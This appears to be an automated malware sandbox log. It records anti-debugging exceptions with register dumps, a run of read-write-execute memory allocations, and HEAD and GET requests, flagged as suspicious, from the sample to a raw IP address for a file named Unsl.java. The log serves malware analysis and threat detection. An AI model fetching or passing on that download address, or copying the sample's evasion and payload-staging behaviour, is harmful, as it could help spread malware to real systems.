registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 18 eb 22 81 85 9c f8 7c 07 68 e3 33 cb a8 39
exception.instruction: mov dword ptr [eax], ebx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0e37
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 25119
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186856
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 12 ff ec 21 2a 00 5a 81 2b f1 aa 98 56 81 33
exception.instruction: mov dword ptr [edx], edx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0e6f
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 45940
registers.ebx: 109186856
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ff 18 2a 89 43 0c 81 b5 3a 02 00 00 43 43 7f
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0e8d
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186856
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 78 09 ec e5 19 cf c4 c6 1d 0f 60 2b 16 c0 dd b2
exception.instruction: js 0x6fe0ed1
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0ec6
registers.esp: 102818668
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186856
registers.esi: 256
registers.ecx: 102818664
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 0b ed bd d4 c7 b4 d7 af 8c 2c b3 f8 14 a1 7e
exception.instruction: mov dword ptr [ebx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0f07
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 9303
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f0 c8 9f 5c 13 27 29 57 bf e7 83 f0 3a 81 f7
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0f27
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186860
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 7c 05 ee 51 e5 cf 34 1d c3 27 9d 91 db a3 d3 fe
exception.instruction: jl 0x6fe0f5d
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0f56
registers.esp: 102818668
registers.edi: 256
registers.eax: 102818664
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186860
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 1b ea b9 34 ee b0 70 73 83 e8 7d f2 7f aa d7
exception.instruction: mov dword ptr [ebx], ebx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0f96
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 33696
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 09 ec 2f 1c 1a 5c c7 da 97 ae 66 1a e1 a4 65
exception.instruction: mov dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0fc1
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186860
registers.esi: 6181472
registers.ecx: 63952
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 32 f7 5f c2 46 8c 01 3a fd 97 6f b4 3d 00 5a
exception.instruction: mov dword ptr [edx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0fee
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 51427
registers.ebx: 109186860
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f3 0d e1 81 4c 08 10 d7 5c 3e ba 92 1e a8 9d
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8194
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186864
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 11 ff a9 e5 30 00 59 81 f2 37 cd 4b cc 81 f2
exception.instruction: mov dword ptr [ecx], edx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc81bc
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 2645040786
registers.ebx: 109186864
registers.esi: 6181472
registers.ecx: 40242
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc e9 4a 86 2a c6 8f 89 43 68 cd 64 bc 98 ed 30
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc81d6
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1
registers.ebx: 109186864
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 75 03 ef 99 a1 6d a9 de 9c c1 4a 96 2d c3 24 01
exception.instruction: jne 0x6fc8210
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc820b
registers.esp: 102818668
registers.edi: 117210658
registers.eax: 256
registers.ebp: 102818684
registers.edx: 1
registers.ebx: 109186864
registers.esi: 6181472
registers.ecx: 102818664
1 0 0

__exception__

stacktrace:
gapfnScSendMessage-0x15fc8 user32+0x0 @ 0x75720000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f1 7e f6 e3 9d 49 3a e7 53 bb f0 ee 3a 11 81
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8253
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1970863390
registers.ebp: 102818684
registers.edx: 1970490104
registers.ebx: 1123106887
registers.esi: 6181472
registers.ecx: 526
1 0 0

__exception__

stacktrace:
gapfnScSendMessage-0x15fc8 user32+0x0 @ 0x75720000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 33 ec f4 55 d8 f7 4f 72 7d 65 c0 bd 73 89 8c
exception.instruction: mov dword ptr [ebx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc826e
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1970863390
registers.ebp: 102818684
registers.edx: 1970490104
registers.ebx: 22785
registers.esi: 6181472
registers.ecx: 526
1 0 0

__exception__

stacktrace:
gapfnScSendMessage-0x15fc8 user32+0x0 @ 0x75720000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 72 02 eb 1b 49 bd b2 0d 39 95 39 b6 8f 90 f2 a6
exception.instruction: jb 0x6fc82c6
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc82c2
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 102818672
registers.ebp: 102818684
registers.edx: 1970490104
registers.ebx: 256
registers.esi: 6181472
registers.ecx: 20480
1 0 0

__exception__

stacktrace:
gapfnScSendMessage-0x15fc8 user32+0x0 @ 0x75720000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc fc 51 57 51 b9 bc 0a e9 05 81 f1 bd f9 01 9b
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc82db
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1970863390
registers.ebp: 102818684
registers.edx: 1970490104
registers.ebx: 1123106887
registers.esi: 6181472
registers.ecx: 20480
1 0 0

__exception__

stacktrace:
gapfnScSendMessage-0x15fc8 user32+0x0 @ 0x75720000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 19 f2 66 93 35 42 3a 48 00 59 51 8b 8d 11 02
exception.instruction: mov dword ptr [ecx], ebx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc82f1
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1970863390
registers.ebp: 102818684
registers.edx: 1970490104
registers.ebx: 1123106887
registers.esi: 6181472
registers.ecx: 14830
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 1e f7 6e 7f 29 7c 10 53 57 cb 2e 46 69 00 5e
exception.instruction: mov dword ptr [esi], ebx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc8326
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 109252384
registers.ebp: 102818684
registers.edx: 1970490104
registers.ebx: 1123106887
registers.esi: 55116
registers.ecx: 526
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 37 f1 b9 b6 12 0e b6 00 5f e8 5f cc 02 00 89
exception.instruction: mov dword ptr [edi], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc8362
registers.esp: 102818680
registers.edi: 11332
registers.eax: 109252384
registers.ebp: 102818684
registers.edx: 994529192
registers.ebx: 1123106887
registers.esi: 6181472
registers.ecx: 2001474680
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f5 44 f5 f3 b8 fd c8 86 01 34 bc 03 52 ba e4
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8377
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 2001271752
registers.ebp: 102818684
registers.edx: 2001266081
registers.ebx: 495305553
registers.esi: 6181472
registers.ecx: 1688
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 32 f7 8c 5e 6b f5 88 8a 1b 28 40 19 57 00 5a
exception.instruction: mov dword ptr [edx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc8396
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 2001271752
registers.ebp: 102818684
registers.edx: 9706
registers.ebx: 495305553
registers.esi: 6181472
registers.ecx: 1688
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc fc f5 7d 68 5a 98 a5 4b 56 be d0 90 39 e6 81
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc83a6
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 2001271752
registers.ebp: 102818684
registers.edx: 2001266081
registers.ebx: 495305553
registers.esi: 6181472
registers.ecx: 1688
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 0e f1 16 be b9 31 35 00 5e 81 34 24 1c 91 25
exception.instruction: mov dword ptr [esi], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc83cd
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 2001271752
registers.ebp: 102818684
registers.edx: 2001266081
registers.ebx: 495305553
registers.esi: 13024
registers.ecx: 1688
1 0 0
suspicious_features Connection to IP address suspicious_request HEAD http://91.244.197.9/new/Unsl.java
suspicious_features Connection to IP address suspicious_request GET http://91.244.197.9/new/Unsl.java
request HEAD http://91.244.197.9/new/Unsl.java
request GET http://91.244.197.9/new/Unsl.java
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0260a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02602000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02612000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02613000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02614000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02687000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0260b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02615000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02616000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02677000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02678000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02679000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
